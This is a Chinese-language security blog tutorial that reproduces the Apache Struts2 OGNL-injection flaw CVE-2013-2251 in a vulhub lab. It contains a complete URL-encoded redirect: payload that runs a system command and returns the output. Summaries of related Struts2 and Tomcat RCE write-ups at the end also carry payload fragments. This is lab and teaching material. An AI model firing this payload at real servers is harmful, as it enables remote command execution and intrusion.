Apache Struts 2 远程代码执行漏洞 CVE-2013-2251

发表于2026-02-03|更新于2026-03-13|漏洞

|总字数:329|阅读时长:1分钟

影响范围

Struts 2.0.0 - 2.3.15

漏洞类型

OGNL 表达式注入

操作系统限制

无

配置要求

默认配置

漏洞利用

执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测

利用原理

在 Struts2 中，DefaultActionMapper 类支持以” action:”、” redirect:”、” redirectAction” 作为导航或重定向过滤，在这些前缀后面可以加入 OGNL 表达式，Struts2 没有对这些前缀做过滤，可以利用 OGNL 表达式调用 Java 静态方法执行任意系统命令

漏洞复现

用现成的 vulhub 来拉取镜像

#下载vulhub源代码
git clone https://github.com/vulhub/vulhub.git
#进入漏洞目录
cd vulhub/struts2/s2-016
#拉取镜像
docker-compose up -d

1773316394891

访问 http://公网: 8080，出现 Hello world 即搭建成功

1773316436796

用 burpsuite 抓取 http://公网: 8080/index.action 数据包

1773316494758

发送到 Repeater 模块

1773316540251
在 action 后添加 payload，括号已经经过 url 编码

?redirect:%24%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'id'%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3D(new%20java.io.InputStreamReader(%23b))%2C%23d%3D(new%20java.io.BufferedReader(%23c))%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D

1773316578390

发送后页面出现 id 结果

1773316617088

文章作者: Johan

文章链接: https://cjh-1001.github.io/2026/02/03/CVE-2013-2251/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Johan的秘密小窝！

相关推荐

Struts2 远程代码执行漏洞 CVE-2017-9805

影响范围 Struts 2.1.2 - 2.3.33 Struts 2.5 - 2.5.12 漏洞类型XML 反序列化操作系统限制无配置要求默认配置漏洞利用写入敏感文件，反弹 shell 获取服务器权限利用原理Struts2 框架对外部组件 XStream 插件默认使用 XStream 处理 XML 格式数据，可以将几乎任何 XML 标签映射为 Java 对象，攻击者在 Java 运行库寻找可以执行系统命令的类，由于 XStream 没有限制，攻击者可以构造特殊的 XML，包含触发点、执行链、敏感命令漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/struts2/s2-052#拉取镜像docker-compose up -d 访问 http://公网: 8080/orders 用 burpsuite 抓取 http://公网: 8080/orders/3/edit 数据包发送到 Repeater 模...

Struts2 远程命令执行漏洞 CVE-2016-3081

影响范围 Struts 2.3.18 - 2.3.28（不包括 2.3.20.2 和 2.3.24.2）漏洞类型OGNL 表达式注入操作系统限制无配置要求默认配置漏洞利用执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测利用原理在配置文件 struts.xml 开启了 devMode（开发者模式），其中允许通过 method 前缀来动态执行 Action 方法。Struts2 内部存在一个安全沙盒，默认禁止执行危险的 Java 方法，为允许调用执行系统命令所需 Java 类，将上下文访问权限重置为默认，payload 片段为 #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS。权限限制接触后，攻击者通过调用 Java 环境的 Runtime 环境执行系统级别的命令，payload 片段为 @java.lang.Runtime@getRuntime ().exec(‘id’)，其中 id 可替换成其他敏感命令漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码g...

Struts2 远程命令执行漏洞 CVE-2021-31805

影响范围 Struts 2.0.0 - 2.5.29 漏洞类型OGNL 表达式注入操作系统限制无配置要求默认配置漏洞利用执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测利用原理Struts 内部对象虽然被锁死了，但是 Struts2 运行在 Tomcat 容器，攻击者可以利用 Tomcat 的 InstanceManager 绕过沙箱（相当于 CVE-2021-31805 是对 CVE-2020-17530 修复的绕过），InstanceManager 新建的 org.apache.commons.collections.BeanMap 对象能绕过普通权限检查，直接操作 memberAccess 的私有属性，利用 BeanMap 的 put 方法把 excludedClasses（Struts2 内部的黑名单）改为空，再通过攻击链执行敏感命令。漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/s...

Struts2 远程代码执行漏洞 CVE-2017-5638

影响范围 Struts 2.3.5 – 2.3.31 Struts 2.5 – 2.5.10 漏洞类型OGNL 表达式注入操作系统限制无配置要求默认配置漏洞利用执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测利用原理漏洞产生主要原因是 Struts2 有一个复杂功能，给错误信息赋动态变量，构造的 payload 通过错误信息进入到动态变量，后续通过动态变量抛出报错信息同时执行敏感命令。Struts2 默认使用 Jakarta 库来解析上传文件，通过构造异常的 Content-Type，Jakarta 解析器无法识别并抛出该字符串错误，Struts2 将错误转化为可读错误提示，findText () 函数解析时候，错误信息内有 %(# 符号，识别为需要计算的表达式，OGNL 引擎解析并执行括号里面的 Java 代码，即敏感命令漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/struts2/s2-...

Struts2 远程代码执行漏洞 CVE-2018-11776

影响范围 Struts 2.3 – 2.3.34 Struts 2.5 – 2.5.16 漏洞类型OGNL 表达式注入操作系统限制无配置要求 alwaysSelectFullNamespace 设置为 true package 标签未定义 namespace 或使用了通配符漏洞利用执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测利用原理Struts2 将 URL 路径中的 namespace 当作 OGNL 表达式，在重定向跳转时对其进行二次解析，执行敏感命令。Struts2 中的 URL 结构通常为 http://域名/命名空间/Action 名.action，如果攻击者访问不存在的命名空间，且配置了 alwaysSelectFullNamespace = true，那么会将攻击者注入的 payload 提取出来，将动态变量赋值为攻击 payload，OGNL 引擎解析命名空间时候执行了恶意 payload 漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com...

Tomcat 文件包含漏洞 CVE-2020-1938

影响范围 Apache Tomcat 6.x (全版本受影响) Apache Tomcat 7.0.0 - 7.0.99 Apache Tomcat 8.5.0 - 8.5.50 Apache Tomcat 9.0.0.M1 - 9.0.30 漏洞类型二进制解析漏洞操作系统限制无配置要求8009 端口打开漏洞利用任意文件读取，例如读取 WEB - INF / web.xml 文件，只能读取使用 AJP 目录下的文件文件包含，RCE 远程代码执行，可以是反弹 shell 利用原理 AJP 协议默认监听端口通常缺乏认证，利用协议缺陷，伪造 javax.servlet.include 属性漏洞复现12#拉取镜像docker run -d -p 8082:8080 -p 8009:8009 --name ghostcat-vulhub vulhub/tomcat:9.0.30 使用云服务器： 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495...

评论

数据加载中